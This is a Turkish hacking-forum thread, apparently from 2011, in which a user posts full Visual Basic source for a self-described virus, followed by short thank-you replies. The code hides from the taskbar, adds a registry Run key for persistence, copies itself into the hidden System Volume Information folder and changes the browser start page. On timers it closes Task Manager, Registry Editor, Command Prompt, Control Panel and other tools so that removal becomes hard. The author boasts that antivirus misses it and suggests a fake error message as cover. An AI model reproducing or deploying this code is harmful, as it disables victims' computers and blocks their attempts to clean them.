THT DUYURU

chat
Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

ugursuz reklam
takipci
Seçenekler

Basit Virüs Kodu .bat virüsü değil tırsmayın :)

PcChoLik - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
07/2011
Nereden:
İstanbul
Yaş:
27
Mesajlar:
1.588
Konular:
115
Teşekkür (Etti):
142
Teşekkür (Aldı):
752
Ticaret:
(0) %
12
2973
03-10-2011 11:03
#1
Basit ama etkili bir virüs.
Kullanıcının ayar yapabildiği Windows'un hayati pencere ve programlarının çalışmasını önleyen bir virüs...
Öncelerden bir virüs, sistemin hiçbir pencereyi açıp işlem yapmasına fırsat vermiyordu.Ben de bu virüsten esinlenerek, kendi çapımda buna benzer bir virüs yazdım.Ama yazmamdaki amaç başkalarına zarar vermak değil,sadece öğretim amaçlıdır.Neyse lafı fazla uzatmadan kodlara geçelim.
Öncelikle her pencere için ayrı timer kullandım.virüs 28 adet pencereyi ve/veya programı engellediği için forma 28 tane timer yerleştirin ve invertal değerlerini 1000 milisecond yapın.Formu ister gizli yapın, ister üzerine bir hata mesajının görüntüsünü yerleştirin Hata mesajı Verdirip Gizlemek daha KaRizMaTiK oluyor

Form Kodları:
*************
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Private Declare Function PostMessage Lib "user32" Alias "PostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Const WM_CLOSE = &H10

Private Sub Form_Load()
App.TaskVisible = False
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
Set Reg = CreateObject("Wscript.Shell")
Reg.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "about:blank"
End Sub
Private Sub Form_Initialize()
On Error Resume Next
Dim yol, ad, TamYol
yol = App.Path
ad = App.EXEName & ".exe"
TamYol = yol & "\" & ad
FileCopy TamYol, "C:\System Volume Information\runsys.exe"
End Sub
Private Sub Form_Terminate()
Dim ac, d1 As String
d1 = "C:\System Volume Information\runsys.exe"
ac = Shell(d1)
End Sub

Private Sub Timer1_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Bilgisayarım")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer10_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Winamp")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer11_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Denetim Masası")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer12_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Görüntü Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer13_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Görev Çubu?u ile Başlat Menüsü Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer14_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Program Ekle veya Kaldır")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer15_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Program ekle/kaldır")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer16_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Klasör Seçenekleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer17_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Aç")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer18_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Farklı Kaydet")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer19_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Ses Ayar Denetimi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer2_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Belgelerim")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer20_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Donanım Ekleme Sihirbazı")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer21_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Tarih ve Saat Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer22_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Ses Efekti ve Ses Aygıtları Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer23_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Internet Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer24_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Sistem Özellikleri")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer25_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Aygıt Yöneticisi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer26_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "********s and Settings")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer27_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Nero Express")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer28_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "about:blank - Microsoft Internet Explorer")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer3_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Program Files")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer4_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "WINDOWS")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer5_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Kayıt Defteri Düzenleyicisi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer6_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Sistem Yapılandırma Yardımcı Programı")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer7_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Komut İstemi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer8_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Windows Görev Yöneticisi")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub

Private Sub Timer9_Timer()
Dim winHwnd As Long
Dim RetVal As Long
winHwnd = FindWindow(vbNullString, "Windows Media Player")
If winHwnd <> 0 Then
PostMessage winHwnd, WM_CLOSE, 0&, 0&
End If
End Sub
*****************************


İşin güzelliği Virüs bir kopyasını System Volume Information klasörüne gizliyor.Biliyorsunuz bu klasör standart şartlarda görünmüyor.Ancak Nero Express vb. programlarla içeriği görebilirsiniz. Kendini başlata kaydediyor ve tıpkı bir trojan gibi kapatılmaya çalışıldığında tekrar çalışıyor.Registry sistem yapılandırma yardımcı programı ve görev yöneticisi gibi programların çalışmasını engellediğinden ayar yapmak ve temizlemek imkansız hale geliyor.Bu arada Yerli malı bu acemi virüsü anti virüsler de tanımıyor. Nasıl ama....
JersaW, snowcu76, uyuz adam Teşekkür etti.
JersaW - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
08/2011
Nereden:
Şehir diyomus venüs yazdm pardon ustaa :D
Mesajlar:
779
Konular:
39
Teşekkür (Etti):
27
Teşekkür (Aldı):
355
Ticaret:
(0) %
03-10-2011 15:05
#2
Nasıl ama....
nasıl istersn
--------------------- /
M'aSaL - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
09/2010
Nereden:
Konya
Mesajlar:
902
Konular:
84
Teşekkür (Etti):
22
Teşekkür (Aldı):
53
Ticaret:
(0) %
03-10-2011 16:58
#3
Teşekkürler Kardes
---------------------
Zor diye birşey yok, imkansızsa zaman alır.
# MailyDation
was here.
qReeYz - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
11/2009
Nereden:
YESIL KAFALILARIN GEZEGENINDEN
Yaş:
30
Mesajlar:
146
Konular:
46
Teşekkür (Etti):
97
Teşekkür (Aldı):
12
Ticaret:
(0) %
02-11-2011 20:16
#4
isime yarar ++
--------------------- TurkHackTeaM


Herzaman Her Yerde
alperenbozkurt - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2011
Nereden:
El Castillo
Yaş:
30
Mesajlar:
516
Konular:
37
Teşekkür (Etti):
51
Teşekkür (Aldı):
89
Ticaret:
(0) %
03-11-2011 07:49
#5
hacııııı bu timerler programlama dillerinde oluyo ama sen hangi programlama diliyle yapıldığını yazmamışsın bide o programlama dilinin linkini koysaydın herkezde yoktur
crayonx - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
06/2010
Nereden:
trakya
Mesajlar:
538
Konular:
7
Teşekkür (Etti):
15
Teşekkür (Aldı):
27
Ticaret:
(0) %
03-11-2011 11:33
#6
eyvalah..
--------------------- Deha;imkansizi mumkun kilabilmektir...

Gemilerin karada da yuruyebilecegini sezmek,Mehmetlerden birini FATIH yapar...

Talihsizligimiz FATIHsizligimizdir...



Hangi yaşta olursak olalım kendi çevirdiğimiz çemberin arkasındaki koşan çocuklarız!!!
PcChoLik - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
07/2011
Nereden:
İstanbul
Yaş:
27
Mesajlar:
1.588
Konular:
115
Teşekkür (Etti):
142
Teşekkür (Aldı):
752
Ticaret:
(0) %
03-11-2011 21:22
#7
Alıntı:
alperenbozkurt´isimli üyeden Alıntı Mesajı göster
hacııııı bu timerler programlama dillerinde oluyo ama sen hangi programlama diliyle yapıldığını yazmamışsın bide o programlama dilinin linkini koysaydın herkezde yoktur
Visual Basic..
uyuz adam Teşekkür etti.
Launch Jw - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
10/2011
Mesajlar:
115
Konular:
37
Teşekkür (Etti):
25
Teşekkür (Aldı):
86
Ticaret:
(0) %
05-11-2011 13:17
#8
Teşekkürler
uyuz adam - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
11/2011
Mesajlar:
53
Konular:
0
Teşekkür (Etti):
414
Teşekkür (Aldı):
2
Ticaret:
(0) %
14-11-2011 18:30
#9
emeğe saygı usta eline sağlık!!!
narkozzzzz - ait Kullanıcı Resmi (Avatar)
Yeni Üye
Üyelik tarihi:
11/2011
Mesajlar:
52
Konular:
2
Teşekkür (Etti):
4
Teşekkür (Aldı):
3
Ticaret:
(0) %
15-11-2011 21:36
#10
Bilen Çok Ama Emege Saygı .

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler